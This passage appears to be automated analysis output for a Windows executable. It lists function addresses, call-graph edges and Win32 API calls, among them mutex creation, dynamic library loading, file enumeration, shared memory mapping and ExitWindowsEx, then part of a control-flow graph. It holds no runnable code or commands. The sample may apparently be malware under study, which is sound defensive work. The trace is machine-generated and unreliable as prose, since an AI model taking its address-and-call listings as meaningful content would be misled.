71137->70925 71138->70943 71139->71123 71140 11135c20 71141 11135c58 71140->71141 71142 11135c29 71140->71142 71143 11145ef0 std::locale::_Init 93 API calls 71142->71143 71144 11135c2e 71143->71144 71144->71141 71145 11133b00 281 API calls 71144->71145 71146 11135c37 71145->71146 71146->71141 71147 1105e820 79 API calls 71146->71147 71147->71141 71148 1115cca0 71149 1115ccb4 71148->71149 71150 1115ccac 71148->71150 71160 1116406b 71149->71160 71153 1115ccd4 71154 1115ce00 71156 11163aa5 _free 67 API calls 71154->71156 71157 1115ce28 71156->71157 71158 1115ccf1 71158->71154 71159 1115cde4 SetLastError 71158->71159 71159->71158 71161 11170fc4 __calloc_crt 67 API calls 71160->71161 71162 11164085 71161->71162 71163 1115ccc8 71162->71163 71184 1116a1af 67 API calls __getptd_noexit 71162->71184 71163->71153 71163->71154 71167 1115c8e0 CoInitializeSecurity CoCreateInstance 71163->71167 71165 11164098 71165->71163 71185 1116a1af 67 API calls __getptd_noexit 71165->71185 71168 1115c955 wsprintfW SysAllocString 71167->71168 71169 1115cad4 71167->71169 71174 1115c99b 71168->71174 71170 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 71169->71170 71172 1115cb00 71170->71172 71171 1115cac1 SysFreeString 71171->71169 71172->71158 71173 1115caa9 71173->71171 71174->71171 71174->71173 71174->71174 71175 1115ca2c 71174->71175 71176 1115ca1a wsprintfW 71174->71176 71186 110978f0 71175->71186 71176->71175 71178 1115ca3e 71179 110978f0 273 API calls 71178->71179 71180 1115ca53 71179->71180 71191 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 71180->71191 71182 1115ca97 71192 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 71182->71192 71184->71165 71185->71163 71187 111101b0 std::locale::_Init 272 API calls 71186->71187 71188 11097923 71187->71188 71189 11097936 SysAllocString 71188->71189 71190 11097954 71188->71190 71189->71190 71190->71178 71191->71182 71192->71173 71193 1102d9f4 71194 1102da01 71193->71194 71195 1102da22 71194->71195 71278 1109f5f0 282 API calls std::locale::_Init 71194->71278 71279 11029490 311 API calls std::locale::_Init 71195->71279 71198 1102da33 71261 11028690 SetEvent 71198->71261 71200 1102da38 71201 1102da42 71200->71201 71202 1102da4d 71200->71202 71280 110eccf0 465 API calls 71201->71280 71204 1102da6a 71202->71204 71205 1102da6f 71202->71205 71281 11059fb0 SetEvent 71204->71281 71207 1102da77 71205->71207 71208 1102daae 71205->71208 71207->71208 71215 1102daa3 Sleep 71207->71215 71209 11147060 std::locale::_Init 21 API calls 71208->71209 71210 1102dab8 71209->71210 71211 1102dac5 71210->71211 71212 1102daf6 71210->71212 71211->71210 71213 1105e820 79 API calls 71211->71213 71214 1102daf3 71212->71214 71262 110b0470 71212->71262 71216 1102dae8 71213->71216 71214->71212 71215->71208 71216->71212 71282 1102d750 301 API calls std::locale::_Init 71216->71282 71223 1102db3a 71224 1102db4d 71223->71224 71284 111361c0 307 API calls 4 library calls 71223->71284 71285 1100d620 71224->71285 71227 1102de59 71228 1102de70 71227->71228 71290 1100d330 71227->71290 71232 1102de97 GetModuleFileNameA GetFileAttributesA 71228->71232 71239 1102dfb3 71228->71239 71230 1102de65 71231 11147060 std::locale::_Init 21 API calls 71230->71231 71231->71228 71234 1102debf 71232->71234 71232->71239 71233 11147060 std::locale::_Init 21 API calls 71236 1102e062 71233->71236 71235 111101b0 std::locale::_Init 272 API calls 71234->71235 71248 1102dec6 71235->71248 71296 11147020 FreeLibrary 71236->71296 71238 1102e06a 71240 1102e0a6 71238->71240 71241 1102e094 ExitWindowsEx 71238->71241 71242 1102e084 ExitWindowsEx Sleep 71238->71242 71239->71233 71243 1102e0b6 71240->71243 71244 1102e0ab Sleep 71240->71244 71241->71240 71242->71241 71245 11147060 std::locale::_Init 21 API calls 71243->71245 71244->71243 71247 1102e0c0 ExitProcess 71245->71247 71249 11143780 87 API calls 71248->71249 71250 1102df0d 71249->71250 71250->71239 71251 11081e00 std::locale::_Init IsDBCSLeadByte 71250->71251 71252 1102df23 71251->71252 71253 1102df3e _memset 71252->71253 71294 11029a70 272 API calls 2 library calls 71252->71294 71255 1102df58 FindFirstFileA 71253->71255 71256 1102df78 FindNextFileA 71255->71256 71258 1102df98 FindClose 71256->71258 71259 1102dfa4 71258->71259 71295 111273e0 298 API calls 5 library calls 71259->71295 71261->71200 71297 110808b0 71262->71297 71267 1102db1a 71271 110eb4a0 71267->71271 71268 110b04b7 71309 11029a70 272 API calls 2 library calls 71268->71309 71272 110b0470 274 API calls 71271->71272 71273 110eb4cd 71272->71273 71325 110ea880 71273->71325 71277 1102db25 71283 110b0660 274 API calls std::locale::_Init 71277->71283 71278->71195 71279->71198 71280->71202 71281->71205 71282->71214 71283->71223 71284->71224 71286 1100d632 71285->71286 71287 1100d62b 71285->71287 71288 1100d63b FreeLibrary 71286->71288 71289 1100d67e 71286->71289 71287->71227 71288->71289 71289->71227 71291 1100d396 wsprintfA 71290->71291 71292 1100d33b 71290->71292 71291->71230 71292->71291 71293 1100d342 71292->71293 71293->71230 71295->71239 71296->71238 71298 110808d4 71297->71298 71299 110808d8 71298->71299 71300 110808ef 71298->71300 71310 11029a70 272 API calls 2 library calls 71299->71310 71302 11080908 71300->71302 71303 110808ec 71300->71303 71306 110b0460 71302->71306 71303->71300 71311 11029a70 272 API calls 2 library calls 71303->71311 71312 11081590 71306->71312 71313 110815b1 71312->71313 71314 110815dd 71312->71314 71313->71314 71315 110815cb 71313->71315 71316 1108162a wsprintfA 71314->71316 71317 11081605 wsprintfA 71314->71317 71318 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 71315->71318 71324 11029a70 272 API calls 2 library calls 71316->71324 71317->71314 71320 110815d9 71318->71320 71320->71267 71320->71268 71327 110ea88b 71325->71327 71326 110ea925 71335 110b0660 274 API calls std::locale::_Init 71326->71335 71327->71326 71328 110ea8ae 71327->71328 71329 110ea8c5 71327->71329 71336 11029a70 272 API calls 2 library calls 71328->71336 71331 110ea8c2 71329->71331 71332 110ea8f2 SendMessageTimeoutA 71329->71332 71331->71329 71337 11029a70 272 API calls 2 library calls 71331->71337 71332->71326 71335->71277 71338 110310d5 GetNativeSystemInfo 71339 110310e1 71338->71339 71343 11031081 71339->71343 71344 11031145 71339->71344 71351 11031088 71339->71351 71340 110312db GetStockObject GetObjectA 71341 1103130a SetErrorMode SetErrorMode 71340->71341 71345 111101b0 std::locale::_Init 272 API calls 71341->71345 71346 111101b0 std::locale::_Init 272 API calls 71343->71346 71347 111101b0 std::locale::_Init 272 API calls 71344->71347 71348 11031346 71345->71348 71346->71351 71347->71351 71404 11028980 71348->71404 71350 11031360 71352 111101b0 std::locale::_Init 272 API calls 71350->71352 71351->71340 71353 11031386 71352->71353 71354 11028980 275 API calls 71353->71354 71355 1103139f InterlockedExchange 71354->71355 71357 111101b0 std::locale::_Init 272 API calls 71355->71357 71358 110313c7 71357->71358 71407 1108a880 71358->71407 71360 110313df GetACP 71418 11163f93 71360->71418 71364 111663a3 _setlocale 111 API calls 71365 11031410 71364->71365 71366 11143780 87 API calls 71365->71366 71367 1103143c 71366->71367 71368 111101b0 std::locale::_Init 272 API calls 71367->71368 71369 1103145c 71368->71369 71370 11061aa0 310 API calls 71369->71370 71372 11031487 71370->71372 71371 110314d4 71374 110ccc90 4 API calls 71371->71374 71372->71371 71373 111101b0 std::locale::_Init 272 API calls 71372->71373 71375 110314ae 71373->71375 71376 110314fa 71374->71376 71379 11061710 301 API calls 71375->71379 71377 111101b0 std::locale::_Init 272 API calls 71376->71377 71378 11031501 71377->71378 71429 11125d40 71378->71429 71379->71371 71405 11088b30 275 API calls 71404->71405 71406 1102898b _memset 71405->71406 71406->71350 71408 111101b0 std::locale::_Init 272 API calls 71407->71408 71409 1108a8b7 71408->71409 71410 1108a8d9 InitializeCriticalSection 71409->71410 71411 111101b0 std::locale::_Init 272 API calls 71409->71411 71414 1108a93a 71410->71414 71413 1108a8d2 71411->71413 71413->71410 71463 1116305a std::exception::_Copy_str 71413->71463 71414->71360 71416 1108a909 71464 111634b1 RaiseException 71416->71464 71419 11163fc6 71418->71419 71420 11163fb1 71418->71420 71419->71420 71421 11163fcd 71419->71421 71487 1116a1af 67 API calls __getptd_noexit 71420->71487 71465 1117027b 107 API calls 9 library calls 71421->71465 71424 11163fb6 71488 1116edc4 11 API calls _strcat_s 71424->71488 71425 11163ff3 71427 11031406 71425->71427 71466 111700e4 71425->71466 71427->71364 71430 111101b0 std::locale::_Init 272 API calls 71429->71430 71431 11125d74 71430->71431 71432 11125da5 71431->71432 71433 11125d8a 71431->71433 71495 11124f70 71432->71495 71541 110765c0 475 API calls std::locale::_Init 71433->71541 71435 11125d9a 71435->71432 71438 11031523 71440 11114fb0 71438->71440 71463->71416 71464->71410 71465->71425 71467 1116a147 _fgets 67 API calls 71466->71467 71468 111700f4 71467->71468 71469 11170116 71468->71469 71470 111700ff 71468->71470 71472 11170127 __stbuf 71469->71472 71473 1117011a 71469->71473 71489 1116a1af 67 API calls __getptd_noexit 71470->71489 71475 11170104 71472->71475 71483 1117017d 71472->71483 71486 11170188 71472->71486 71491 111799f8 67 API calls _strcat_s 71472->71491 71490 1116a1af 67 API calls __getptd_noexit 71473->71490 71475->71427 71476 11170217 71494 111730a4 100 API calls 6 library calls 71476->71494 71477 11170197 71478 111701ae 71477->71478 71482 111701cb 71477->71482 71492 111730a4 100 API calls 6 library calls 71478->71492 71482->71475 71493 1117650e 72 API calls 6 library calls 71482->71493 71485 11177ff0 __getbuf 67 API calls 71483->71485 71483->71486 71485->71486 71486->71476 71486->71477 71487->71424 71488->71427 71489->71475 71490->71475 71491->71483 71492->71475 71493->71475 71494->71475 71496 11124fd1 InitializeCriticalSection 71495->71496 71498 11124ffe GetCurrentThreadId 71496->71498 71500 11125035 71498->71500 71501 1112503c 71498->71501 71575 1110fff0 InterlockedIncrement 71500->71575 71543 11160b10 InterlockedIncrement 71501->71543 71504 11125051 71505 1105e820 79 API calls 71504->71505 71506 11125089 71505->71506 71508 111101b0 std::locale::_Init 272 API calls 71506->71508 71511 111250e2 71506->71511 71507 111101b0 std::locale::_Init 272 API calls 71510 1112510a 71507->71510 71509 111250c3 71508->71509 71509->71511 71512 11110de0 436 API calls 71509->71512 71514 11125134 71510->71514 71576 1100d2c0 452 API calls 71510->71576 71511->71507 71512->71511 71515 111251ac 71514->71515 71516 111101b0 std::locale::_Init 272 API calls 71514->71516 71517 111101b0 std::locale::_Init 272 API calls 71515->71517 71520 1112515f 71516->71520 71519 111251c9 71517->71519 71518 11125215 GlobalAddAtomA GetVersionExA 71521 11125252 71518->71521 71522 1112525d 71518->71522 71519->71518 71578 110719d0 276 API calls 71519->71578 71520->71515 71577 1110f2d0 273 API calls std::locale::_Init 71520->71577 71579 11116460 12 API calls 2 library calls 71521->71579 71525 1105e820 79 API calls 71522->71525 71528 11125271 71525->71528 71527 11125257 71527->71522 71529 1105e820 79 API calls 71528->71529 71530 1112528b 71529->71530 71531 1105e820 79 API calls 71530->71531 71532 111252a5 71531->71532 71533 1105e820 79 API calls 71532->71533 71534 111252c3 71533->71534 71535 1105e820 79 API calls 71534->71535 71536 111252e9 71535->71536 71537 1105e820 79 API calls 71536->71537 71538 11125303 71537->71538 71539 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 71538->71539 71540 11125330 71539->71540 71540->71438 71542 110717d0 276 API calls std::locale::_Init 71540->71542 71541->71435 71542->71438 71544 11160b27 CreateCompatibleDC 71543->71544 71545 11160b22 71543->71545 71547 11160b4c SelectPalette SelectPalette 71544->71547 71548 11160b38 71544->71548 71580 11160a60 279 API calls std::locale::_Init 71545->71580 71582 11160750 272 API calls 71547->71582 71581 11029a70 272 API calls 2 library calls 71548->71581 71552 11160b73 71583 11160750 272 API calls 71552->71583 71554 11160b80 71555 11160b93 71554->71555 71556 11160c4e 71554->71556 71584 111606e0 272 API calls 2 library calls 71555->71584 71588 11160750 272 API calls 71556->71588 71559 11160b9e 71561 11160bc3 71559->71561 71562 11160bad GetSystemPaletteEntries 71559->71562 71560 11160c5b 71563 11160c61 DeleteDC 71560->71563 71564 11160be6 71561->71564 71565 11160bcf 71561->71565 71562->71564 71563->71504 71586 111606e0 272 API calls 2 library calls 71564->71586 71585 11029a70 272 API calls 2 library calls 71565->71585 71569 11160bf2 _memmove 71570 1116406b _calloc 67 API calls 71569->71570 71571 11160c21 71570->71571 71571->71563 71572 11160c2b 71571->71572 71587 11029a70 272 API calls 2 library calls 71572->71587 71575->71501 71576->71514 71577->71515 71578->71518 71579->71527 71580->71544 71582->71552 71583->71554 71584->71559 71586->71569 71588->71560 71627 11089cf0 71628 111103d0 ___DllMainCRTStartup 4 API calls 71627->71628 71629 11089d03 71628->71629 71630 11089d0d 71629->71630 71639 11089430 275 API calls std::locale::_Init 71629->71639 71632 11089d34 71630->71632 71640 11089430 275 API calls std::locale::_Init 71630->71640 71635 11089d43 71632->71635 71636 11089cc0 71632->71636 71641 11089950 71636->71641 71639->71630 71640->71632 71678 11088c40 6 API calls ___DllMainCRTStartup 71641->71678 71643 11089989 GetParent 71644 1108999c 71643->71644 71645 110899ad 71643->71645 71646 110899a0 GetParent 71644->71646 71647 11145990 274 API calls 71645->71647 71646->71645 71646->71646 71648 110899b9 71647->71648 71649 11164ead std::locale::_Init 145 API calls 71648->71649 71650 110899c6 std::ios_base::_Ios_base_dtor 71649->71650 71651 11145990 274 API calls 71650->71651 71652 110899df 71651->71652 71679 11013dd0 22 API calls 2 library calls 71652->71679 71654 110899fa 71654->71654 71655 11143e00 std::locale::_Init 8 API calls 71654->71655 71656 11089a3a std::ios_base::_Ios_base_dtor 71655->71656 71657 11164c77 std::locale::_Init 105 API calls 71656->71657 71658 11089a73 std::locale::_Init 71656->71658 71657->71658 71660 1102ad70 std::locale::_Init 148 API calls 71658->71660 71669 11089b24 std::ios_base::_Ios_base_dtor 71658->71669 71659 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 71661 11089c12 71659->71661 71662 11089ac3 71660->71662 71661->71635 71663 11081e00 std::locale::_Init IsDBCSLeadByte 71662->71663 71664 11089ae2 71663->71664 71665 11081e70 88 API calls 71664->71665 71664->71669 71666 11089afa 71665->71666 71667 11089b3e 71666->71667 71668 11089b01 71666->71668 71671 11081e70 88 API calls 71667->71671 71680 110b7aa0 71668->71680 71669->71659 71673 11089b49 71671->71673 71673->71669 71674 110b7aa0 69 API calls 71673->71674 71676 11089b56 71674->71676 71675 110b7aa0 69 API calls 71675->71669 71676->71669 71677 110b7aa0 69 API calls 71676->71677 71677->71669 71678->71643 71679->71654 71683 110b7a80 71680->71683 71686 111681a3 71683->71686 71689 11168124 71686->71689 71690 11168131 71689->71690 71691 1116814b 71689->71691 71707 1116a1c2 67 API calls __getptd_noexit 71690->71707 71691->71690 71692 11168154 GetFileAttributesA 71691->71692 71694 11168162 GetLastError 71692->71694 71698 11168178 71692->71698 71710 1116a1d5 67 API calls 3 library calls 71694->71710 71695 11168136 71708 1116a1af 67 API calls __getptd_noexit 71695->71708 71700 11089b07 71698->71700 71712 1116a1c2 67 API calls __getptd_noexit 71698->71712 71699 1116813d 71709 1116edc4 11 API calls _strcat_s 71699->71709 71700->71669 71700->71675 71701 1116816e 71711 1116a1af 67 API calls __getptd_noexit 71701->71711 71705 1116818b 71713 1116a1af 67 API calls __getptd_noexit 71705->71713 71707->71695 71708->71699 71709->71700 71710->71701 71711->71700 71712->71705 71713->71701 71714 11030b78 71715 11030b86 71714->71715 71716 11143780 87 API calls 71715->71716 71717 11030bc3 71716->71717 71718 11030bd8 71717->71718 71719 11081e70 88 API calls 71717->71719 71720 110ed520 8 API calls 71718->71720 71719->71718 71721 11030bff 71720->71721 71722 11030c49 71721->71722 71771 110ed5d0 81 API calls 2 library calls 71721->71771 71725 11143780 87 API calls 71722->71725 71724 11030c14 71772 110ed5d0 81 API calls 2 library calls 71724->71772 71727 11030c60 71725->71727 71729 111101b0 std::locale::_Init 272 API calls 71727->71729 71728 11030c2b 71728->71722 71730 11146fe0 19 API calls 71728->71730 71731 11030c6f 71729->71731 71730->71722 71732 11030c90 71731->71732 71733 11088b30 275 API calls 71731->71733 71734 1108a880 275 API calls 71732->71734 71733->71732 71735 11030ca3 OpenMutexA 71734->71735 71736 11030cc3 CreateMutexA 71735->71736 71737 11030dda CloseHandle 71735->71737 71738 11030ce3 71736->71738 71764 1108a980 71737->71764 71740 111101b0 std::locale::_Init 272 API calls 71738->71740 71741 11030cf8 71740->71741 71743 11030d1b 71741->71743 71745 11061710 301 API calls 71741->71745 71742 11030df0 71744 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 71742->71744 71773 110161e0 LoadLibraryA 71743->71773 71746 11031773 71744->71746 71745->71743 71748 11030d2d 71749 11145c70 std::locale::_Init 93 API calls 71748->71749 71750 11030d3c 71749->71750 71751 11030d49 71750->71751 71752 11030d5c 71750->71752 71774 111466b0 96 API calls std::locale::_Init 71751->71774 71754 11030d66 GetProcAddress 71752->71754 71755 11030d50 71752->71755 71754->71755 71756 11030d80 SetLastError 71754->71756 71757 110287a0 47 API calls 71755->71757 71756->71755 71758 11030d8d 71757->71758 71775 11009370 439 API calls std::locale::_Init 71758->71775 71760 11030d9c 71761 11030db0 WaitForSingleObject 71760->71761 71761->71761 71762 11030dc2 CloseHandle 71761->71762 71762->71737 71763 11030dd3 FreeLibrary 71762->71763 71763->71737 71765 1108aa27 71764->71765 71769 1108a9ba std::ios_base::_Ios_base_dtor 71764->71769 71766 1108aa2e DeleteCriticalSection 71765->71766 71776 1115c2d0 71766->71776 71767 1108a9ce CloseHandle 71767->71769 71769->71765 71769->71767 71770 1108aa54 std::ios_base::_Ios_base_dtor 71770->71742 71771->71724 71772->71728 71773->71748 71774->71755 71775->71760 71779 1115c2e4 71776->71779 71777 1115c2e8 71777->71770 71779->71777 71779->71779 71780 1115c040 70 API calls 2 library calls 71779->71780 71780->71779 71781 1116a5cd 71782 1116a5dd 71781->71782 71783 1116a5d8 71781->71783 71787 1116a4d7 71782->71787 71799 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 71783->71799 71786 1116a5eb 71788 1116a4e3 __alloc_osfhnd 71787->71788 71789 1116a530 71788->71789 71797 1116a580 __alloc_osfhnd 71788->71797 71800 1116a373 71788->71800 71789->71797 71850 11026410 71789->71850 71792 1116a543 71793 1116a560 71792->71793 71795 11026410 ___DllMainCRTStartup 7 API calls 71792->71795 71794 1116a373 __CRT_INIT@12 150 API calls 71793->71794 71793->71797 71794->71797 71796 1116a557 71795->71796 71798 1116a373 __CRT_INIT@12 150 API calls 71796->71798 71797->71786 71798->71793 71799->71782 71801 1116a37f __alloc_osfhnd 71800->71801 71802 1116a387 71801->71802 71803 1116a401 71801->71803 71859 1116e390 HeapCreate 71802->71859 71805 1116a407 71803->71805 71806 1116a462 71803->71806 71811 1116a425 71805->71811 71819 1116a390 __alloc_osfhnd 71805->71819 71950 1116e65b 67 API calls _doexit 71805->71950 71807 1116a467 71806->71807 71808 1116a4c0 71806->71808 71810 1116c4ba ___set_flsgetvalue 3 API calls 71807->71810 71808->71819 71956 1116c7be 80 API calls __freefls@4 71808->71956 71809 1116a38c 71809->71819 71860 1116c82c GetModuleHandleW 71809->71860 71814 1116a46c 71810->71814 71812 1116a439 71811->71812 71951 1117226e 68 API calls _free 71811->71951 71954 1116a44c 71 API calls __mtterm 71812->71954 71820 1116ac7e __calloc_crt 67 API calls 71814->71820 71819->71789 71824 1116a478 71820->71824 71821 1116a39c __RTC_Initialize 71822 1116a3a0 71821->71822 71829 1116a3ac GetCommandLineA 71821->71829 71947 1116e3ae HeapDestroy 71822->71947 71823 1116a42f 71952 1116c50b 71 API calls _free 71823->71952 71824->71819 71827 1116a484 DecodePointer 71824->71827 71830 1116a499 71827->71830 71828 1116a434 71953 1116e3ae HeapDestroy 71828->71953 71885 11177e54 GetEnvironmentStringsW 71829->71885 71833 1116a4b4 71830->71833 71834 1116a49d 71830->71834 71837 11163aa5 _free 67 API calls 71833->71837 71955 1116c548 67 API calls 4 library calls 71834->71955 71837->71819 71839 1116a4a4 GetCurrentThreadId 71839->71819 71841 1116a3ca 71948 1116c50b 71 API calls _free 71841->71948 71845 1116a3ea 71845->71819 71949 1117226e 68 API calls _free 71845->71949 71851 111104e0 71850->71851 71852 11110501 71851->71852 71853 111104ec 71851->71853 71854 11110514 ___DllMainCRTStartup 71851->71854 71855 11110430 ___DllMainCRTStartup 7 API calls 71852->71855 71853->71854 71856 11110430 ___DllMainCRTStartup 7 API calls 71853->71856 71854->71792 71857 11110508 71855->71857 71858 111104f5 71856->71858 71857->71792 71858->71792 71859->71809 71861 1116c840 71860->71861 71862 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71860->71862 71957 1116c50b 71 API calls _free 71861->71957 71863 1116c893 TlsAlloc 71862->71863 71867 1116c9a2 71863->71867 71868 1116c8e1 TlsSetValue 71863->71868 71866 1116c845 71866->71821 71867->71821 71868->71867 71869 1116c8f2 71868->71869 71958 1116e417 RtlEncodePointer EncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 71869->71958 71871 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 71959 11174425 InitializeCriticalSectionAndSpinCount 71871->71959 71873 1116c936 71874 1116c99d 71873->71874 71875 1116c93a DecodePointer 71873->71875 71961 1116c50b 71 API calls _free 71874->71961 71877 1116c94f 71875->71877 71877->71874 71878 1116ac7e __calloc_crt 67 API calls 71877->71878 71879 1116c965 71878->71879 71879->71874 71880 1116c96d DecodePointer 71879->71880 71881 1116c97e 71880->71881 71881->71874 71882 1116c982 71881->71882 71960 1116c548 67 API calls 4 library calls 71882->71960 71884 1116c98a GetCurrentThreadId 71884->71867 71886 1116a3bc 71885->71886 71888 11177e70 71885->71888 71898 11172029 GetStartupInfoW 71886->71898 71887 11177e85 WideCharToMultiByte 71889 11177ea5 71887->71889 71890 11177edd FreeEnvironmentStringsW 71887->71890 71888->71887 71888->71888 71891 1116ac39 __malloc_crt 67 API calls 71889->71891 71890->71886 71892 11177eab 71891->71892 71892->71890 71893 11177eb3 WideCharToMultiByte 71892->71893 71894 11177ec5 71893->71894 71895 11177ed1 FreeEnvironmentStringsW 71893->71895 71896 11163aa5 _free 67 API calls 71894->71896 71895->71886 71897 11177ecd 71896->71897 71897->71895 71899 1116ac7e __calloc_crt 67 API calls 71898->71899 71906 11172047 71899->71906 71900 1116a3c6 71900->71841 71911 11177d99 71900->71911 71901 111721bc 71902 111721f2 GetStdHandle 71901->71902 71904 11172256 SetHandleCount 71901->71904 71907 11172204 GetFileType 71901->71907 71910 1117222a InitializeCriticalSectionAndSpinCount 71901->71910 71902->71901 71903 1116ac7e __calloc_crt 67 API calls 71903->71906 71904->71900 71905 1117213c 71905->71901 71908 11172173 InitializeCriticalSectionAndSpinCount 71905->71908 71909 11172168 GetFileType 71905->71909 71906->71900 71906->71901 71906->71903 71906->71905 71907->71901 71908->71900 71908->71905 71909->71905 71909->71908 71910->71900 71910->71901 71912 11177db3 GetModuleFileNameA 71911->71912 71913 11177dae 71911->71913 71915 11177dda 71912->71915 71968 11171a45 93 API calls __setmbcp 71913->71968 71962 11177bff 71915->71962 71918 1116ac39 __malloc_crt 67 API calls 71919 11177e1c 71918->71919 71920 11177bff _parse_cmdline 77 API calls 71919->71920 71921 1116a3d6 71919->71921 71920->71921 71921->71845 71922 11177b23 71921->71922 71923 11177b2c 71922->71923 71927 11177b31 71922->71927 71970 11171a45 93 API calls __setmbcp 71923->71970 71925 11177b5d 71928 1116ac7e __calloc_crt 67 API calls 71925->71928 71926 11177b4c _strlen 71926->71927 71927->71925 71927->71926 71932 1116a3df 71927->71932 71934 11177b66 71928->71934 71929 11177bb5 71931 11163aa5 _free 67 API calls 71929->71931 71930 11177b7d _strlen 71930->71934 71931->71932 71932->71845 71941 1116e46e 71932->71941 71933 1116ac7e __calloc_crt 67 API calls 71933->71934 71934->71929 71934->71930 71934->71932 71934->71933 71935 11177bdb 71934->71935 71937 1116cd5f _strcpy_s 67 API calls 71934->71937 71938 11177bf2 71934->71938 71936 11163aa5 _free 67 API calls 71935->71936 71936->71932 71937->71934 71939 1116ed72 __invoke_watson 10 API calls 71938->71939 71940 11177bfe 71939->71940 71942 1116e47c __IsNonwritableInCurrentImage 71941->71942 71971 1116d88b 71942->71971 71944 1116e49a __initterm_e 71946 1116e4bb __IsNonwritableInCurrentImage 71944->71946 71974 11163dd5 71944->71974 71946->71845 71947->71819 71948->71822 71949->71841 71950->71811 71951->71823 71952->71828 71953->71812 71954->71819 71955->71839 71956->71819 71957->71866 71958->71871 71959->71873 71960->71884 71961->71867 71964 11177c1e 71962->71964 71966 11177c8b 71964->71966 71969 11177590 77 API calls x_ismbbtype_l 71964->71969 71965 11177d89 71965->71918 71965->71921 71966->71965 71967 11177590 77 API calls __splitpath_helper 71966->71967 71967->71966 71968->71912 71969->71964 71970->71927 71972 1116d891 EncodePointer 71971->71972 71972->71972 71973 1116d8ab 71972->71973 71973->71944 71977 11163d99 71974->71977 71976 11163de2 71976->71946 71978 11163da5 __alloc_osfhnd 71977->71978 71985 1116e405 71978->71985 71984 11163dc6 __alloc_osfhnd 71984->71976 71986 1117459f __lock 67 API calls 71985->71986 71987 11163daa 71986->71987 71988 11163cb2 RtlDecodePointer DecodePointer 71987->71988 71989 11163ce0 71988->71989 71990 11163d61 71988->71990 71989->71990 72004 1116fe8f 68 API calls _strcat_s 71989->72004 72001 11163dcf 71990->72001 71992 11163cf2 71993 11163d44 EncodePointer EncodePointer 71992->71993 71994 11163d1c 71992->71994 71995 11163d0d 71992->71995 71993->71990 71994->71990 71997 11163d16 71994->71997 72005 1116acca 71 API calls __realloc_crt 71995->72005 71997->71994 71999 11163d32 EncodePointer 71997->71999 72006 1116acca 71 API calls __realloc_crt 71997->72006 71999->71993 72000 11163d2c 72000->71990 72000->71999 72007 1116e40e 72001->72007 72004->71992 72005->71997 72006->72000 72010 111744c6 LeaveCriticalSection 72007->72010 72009 11163dd4 72009->71984 72010->72009 72011 1116c488 RtlEncodePointer

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 783 1109e641-1109e655 LocalAlloc 777->783 784 1109e7a4-1109e7a6 777->784 780 1109ec32-1109ec4d call 11162bb7 778->780 786 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 783->786 787 1109ec25-1109ec2b call 1109d8f0 783->787 788 1109e736-1109e75b CreateFileMappingA 784->788 791 1109e71a-1109e730 786->791 792 1109e693-1109e6be call 1109d7d0 call 1109d810 786->792 787->778 789 1109e7a8-1109e7bb GetLastError 788->789 790 1109e75d-1109e77d GetLastError call 110d6c20 788->790 796 1109e7bd 789->796 797 1109e7c2-1109e7d9 MapViewOfFile 789->797 802 1109e788-1109e790 790->802 803 1109e77f-1109e786 LocalFree 790->803 791->788 820 1109e709-1109e711 792->820 821 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 792->821 796->797 800 1109e7db-1109e7f6 call 110d6c20 797->800 801 1109e817-1109e81f 797->801 823 1109e7f8-1109e7f9 LocalFree 800->823 824 1109e7fb-1109e803 800->824 804 1109e8c1-1109e8d3 801->804 805 1109e825-1109e83e GetModuleFileNameA 801->805 812 1109e792-1109e793 LocalFree 802->812 813 1109e795-1109e79f 802->813 803->802 808 1109e919-1109e932 call 11162be0 GetTickCount 804->808 809 1109e8d5-1109e8d8 804->809 810 1109e8dd-1109e8f8 call 110d6c20 805->810 811 1109e844-1109e84d 805->811 840 1109e934-1109e939 808->840 816 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 809->816 838 1109e8fa-1109e8fb LocalFree 810->838 839 1109e8fd-1109e905 810->839 811->810 817 1109e853-1109e856 811->817 812->813 819 1109ec1e-1109ec20 call 1109dce0 813->819 844 1109ea2b-1109ea42 CreateEventA 816->844 845 1109ea25 816->845 828 1109e899-1109e8bc call 110d6c20 call 1109dce0 817->828 829 1109e858-1109e85c 817->829 819->787 820->791 833 1109e713-1109e714 FreeLibrary 820->833 821->820 832 1109e6f8-1109e703 SetSecurityDescriptorSacl 821->832 823->824 825 1109e808-1109e812 824->825 826 1109e805-1109e806 LocalFree 824->826 825->819 826->825 828->804 829->828 837 1109e85e-1109e869 829->837 832->820 833->791 846 1109e870-1109e874 837->846 838->839 847 1109e90a-1109e914 839->847 848 1109e907-1109e908 LocalFree 839->848 841 1109e93b-1109e94a 840->841 842 1109e94c 840->842 841->840 841->842 849 1109e94e-1109e954 842->849 853 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 844->853 854 1109ea66-1109ea6e 844->854 845->844 851 1109e890-1109e892 846->851 852 1109e876-1109e878 846->852 847->819 848->847 855 1109e965-1109e9bd 849->855 856 1109e956-1109e963 849->856 860 1109e895-1109e897 851->860 857 1109e87a-1109e880 852->857 858 1109e88c-1109e88e 852->858 853->854 861 1109ea70 854->861 862 1109ea76-1109ea87 CreateEventA 854->862 855->816 856->849 856->855 857->851 865 1109e882-1109e88a 857->865 858->860 860->810 860->828 861->862 863 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 862->863 864 1109eaab-1109eab3 862->864 863->864 868 1109eabb-1109eacd CreateEventA 864->868 869 1109eab5 864->869 